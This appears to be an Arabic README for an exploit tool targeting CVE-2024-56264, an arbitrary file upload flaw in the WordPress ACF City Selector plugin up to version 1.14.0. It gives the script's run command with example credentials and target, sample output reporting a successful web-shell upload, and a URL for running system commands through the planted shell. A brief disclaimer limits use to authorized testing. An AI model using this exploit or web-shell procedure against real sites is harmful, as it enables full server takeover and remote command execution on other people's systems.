
إضافة WordPress ACF City Selector <= 1.14.0 - ثغرة رفع ملفات عشوائية
يحتوي هذا المستودع على استغلال لـ CVE-2024-56264، وهي ثغرة رفع ملفات تعسفي موجودة في إضافة ACF City Selector لووردبريس (الإصدارات <= 1.14.0). تتيح هذه الثغرة للمهاجم رفع ملف PHP خبيث (ويب شيل) إلى تثبيت ووردبريس هش وتنفيذ أوامر تعسفية على الخادم.
<= 1.14.0إضافة ACF City Selector لا تتحقق بشكل صحيح من الملفات المرفوعة، مما يسمح للمهاجمين بـتجاوز القيود ورفع ملفات PHP تعسفية. بمجرد رفع ملف PHP خبيث، يمكن للمهاجم تنفيذ أوامر النظام عن بُعد، مما يؤدي إلى اختراق الخادم بالكامل.
تأكد من تثبيت ما يلي قبل تشغيل السكربت:
requests (قم بالتثبيت باستخدام: pip install requests)يمكنك تثبيت جميع التبعيات المطلوبة باستخدام:
pip install -r requirements.txt
تشغيل الاستغلال:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
عند نجاح الاستغلال، يجب أن ترى:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
في حال النجاح، يمكنك الوصول إلى الشيل المرفوع عبر:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
يتيح ذلك تنفيذ الأوامر عن بُعد على الخادم.
هذا السكربت مخصص فقط للأغراض التعليمية واختبار الاختراق المصرح به. الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى عواقب وخيمة. المؤلف غير مسؤول عن أي إساءة استخدام لهذا الاستغلال.